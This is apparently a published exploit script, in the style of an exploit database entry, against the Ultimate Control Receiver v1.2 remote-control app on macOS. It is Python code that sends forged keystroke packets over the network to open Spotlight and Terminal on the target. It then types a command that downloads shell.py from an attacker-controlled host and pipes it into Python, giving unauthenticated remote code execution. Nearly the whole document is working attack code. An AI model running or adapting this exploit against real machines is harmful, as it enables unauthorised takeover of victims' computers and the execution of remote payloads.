# Exploit Title: Ultimate Control Receiver (MacOS) v1.2) - Remote Code Execution
# Date: 4/08/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.negusoft.com/
# Software Link: https://www.negusoft.com/ucontrol/downloads/mac.html
# Version: 1.2
# Tested on: macOS 14.4 Sonoma


'''
Description:

Ultimate Control Receiver v1.2 is vulnerable to unauthenticated remote code
execution. An attacker can exploit the keyboard input functionality over
TCP to execute arbitrary system commands on the target machine without user
interaction.

'''

import socket
import time
import struct

TARGET_IP = "192.168.1.143"
TARGET_PORT = 13894
LHOST = "192.168.1.63"

COMMAND = 4194304
SPACE = 32
ENTER = 13
F11 = 16777236

def create_connection_message():
    return bytes([3, 3] + [0]*30)

def create_type_char_message(char):
    msg = bytearray(32)
    msg[0] = 18
    msg[1] = 18
    struct.pack_into(">I", msg, 4, ord(char))
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg

def send_udp_handshake():
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        udp_sock.sendto(create_connection_message(), (TARGET_IP,
TARGET_PORT))
    finally:
        udp_sock.close()

def send_char_over_tcp(char):
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.settimeout(2)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_type_char_message(char))
    finally:
        tcp_sock.close()

def send_string(text):
    for char in text:

        send_char_over_tcp(char)
        time.sleep(1)

def press_f11():
    """Press F11 key only"""
    send_udp_handshake()
    time.sleep(1)
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(F11, 2))
        tcp_sock.send(create_key_message(F11, 1))
    finally:
        tcp_sock.close()

def open_spotlight():
    send_udp_handshake()
    time.sleep(1)
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(COMMAND, 2, True))
        tcp_sock.send(create_key_message(SPACE, 2, True))
        tcp_sock.send(create_key_message(SPACE, 1, True))
        tcp_sock.send(create_key_message(COMMAND, 1, True))
    finally:
        tcp_sock.close()

def create_key_message(key_code, action, command=False):
    msg = bytearray(32)
    msg[0] = 17
    msg[1] = 17
    msg[2] = 1 << 4 if command else 0
    msg[3] = [0, 3, 1][action]
    struct.pack_into(">I", msg, 4, key_code)
    struct.pack_into(">Q", msg, 24, int(time.time() * 1000))
    return msg

def main():

    print("Initial Access...")
    press_f11()
    time.sleep(5)

    print("Opening Spotlight...")
    open_spotlight()
    time.sleep(2)

    send_udp_handshake()
    time.sleep(1)
    print("Typing 'terminal'...")
    send_string("terminal")
    time.sleep(1)

    print("Pressing Enter...")

    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(ENTER, 0))
    finally:
        tcp_sock.close()
    time.sleep(10)


    print("Executing payload...")
    cmd = f"curl -s http://{LHOST}/shell.py | $(which python3 || which
python)"
    send_string(cmd)


    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        tcp_sock.connect((TARGET_IP, TARGET_PORT))
        tcp_sock.send(create_key_message(ENTER, 0))
    finally:
        tcp_sock.close()

    print("Operation complete")

if __name__ == "__main__":
    main()
    time.sleep(1)